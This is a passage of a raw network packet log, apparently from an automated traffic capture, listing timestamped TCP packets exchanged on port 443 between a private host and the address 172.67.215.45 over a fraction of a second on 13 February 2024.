                                                                  Feb 13, 2024 21:13:55.010457993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.010466099 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.010490894 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.010616064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.010782957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.010796070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.010857105 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.010864973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.011466026 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.011483908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.011529922 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.011529922 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.011538982 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.011979103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.011991978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012037039 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.012044907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012054920 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.012639999 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012660027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012701988 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.012701988 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.012710094 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012909889 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012923002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.012964010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.012972116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013020992 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.013639927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013659000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013701916 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.013701916 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.013710022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013775110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013788939 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013834953 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.013844967 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.013868093 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.014658928 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014678955 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014704943 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.014714956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014743090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.014791965 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014805079 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014842033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.014848948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.014859915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.015631914 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.015670061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.015718937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.015718937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.015727043 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.015758038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.015770912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.015813112 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.015813112 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.015820026 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.016680002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.016696930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.016741037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.016746998 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.016761065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.016974926 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.016988993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017077923 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.017085075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017700911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017720938 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017760992 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.017765999 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017812967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.017867088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017880917 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017914057 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.017920971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.017932892 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.018661976 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.018678904 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.018727064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.018727064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.018733978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.018834114 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.018846989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.018929958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.018937111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.019695997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.019712925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.019761086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.019768000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020246029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020261049 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020294905 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.020309925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020653963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020673990 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.020721912 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.020721912 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.020729065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021351099 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021363020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021473885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.021481037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021677971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021696091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021737099 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.021737099 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.021744013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.021755934 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.022346020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022360086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022397995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.022404909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022747993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022766113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022814035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.022819996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.022829056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.023258924 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.023272038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.023463011 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.023469925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.023570061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.023587942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.023637056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.023637056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.023643017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024388075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024400949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024439096 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.024445057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024544954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024564981 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024590015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.024604082 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.024632931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.025244951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.025259018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.025294065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.025310040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.025495052 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.025512934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.025562048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.025562048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.025568962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026149035 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026161909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026206017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.026213884 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026400089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026417017 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.026468992 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.026468992 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.026475906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027090073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027102947 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027164936 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.027164936 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.027179956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027446032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027465105 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027493000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.027506113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.027549982 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.028080940 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028094053 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028137922 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.028146029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028450966 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028467894 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028512955 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.028518915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.028529882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.029670954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.029684067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.029735088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.029742956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.029761076 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.029967070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.029983997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.030011892 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.030018091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.030034065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031104088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031115055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031164885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031164885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031173944 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031430960 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031446934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031491041 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031498909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031508923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031519890 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031543016 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031543016 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031553984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031580925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031712055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031728983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031774044 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031774044 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031780958 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031811953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031825066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.031867027 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031867027 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.031874895 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032088995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032104969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032145977 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.032154083 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032162905 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.032754898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032767057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.032845020 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.032854080 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033073902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033090115 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033116102 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.033133984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033144951 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.033236027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033247948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033298016 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.033304930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033958912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.033977032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034024000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.034024000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.034033060 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034626961 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034638882 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034678936 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.034688950 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034738064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034753084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034790039 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.034795046 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.034820080 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.035053015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035068035 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035480976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.035495043 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035837889 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035856009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035907984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.035907984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.035914898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035950899 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.035964012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036006927 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.036011934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036612988 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036632061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036684990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.036684990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.036695957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036905050 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.036916971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037487030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.037502050 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037694931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037709951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037755966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.037766933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037791014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.037796974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037812948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.037857056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.037857056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.037864923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038484097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038499117 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038542032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.038564920 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038620949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038631916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.038682938 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.038691044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039366007 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039382935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039431095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.039431095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.039439917 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039535999 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039547920 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.039593935 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.039593935 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.039602041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040363073 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040380001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040421963 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.040430069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040440083 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.040590048 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040601969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.040668964 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.040676117 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041306019 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041323900 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041373014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.041373014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.041382074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041390896 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041409016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.041451931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.041451931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.041459084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042035103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042049885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042299032 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042304993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.042311907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042345047 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042354107 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.042385101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042418957 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.042687893 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.042975903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.042990923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043042898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043047905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043098927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043116093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043133974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043133974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043140888 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043184042 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043184042 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043838978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043853045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043894053 CET49701443192.168.2.6172.67.215.45
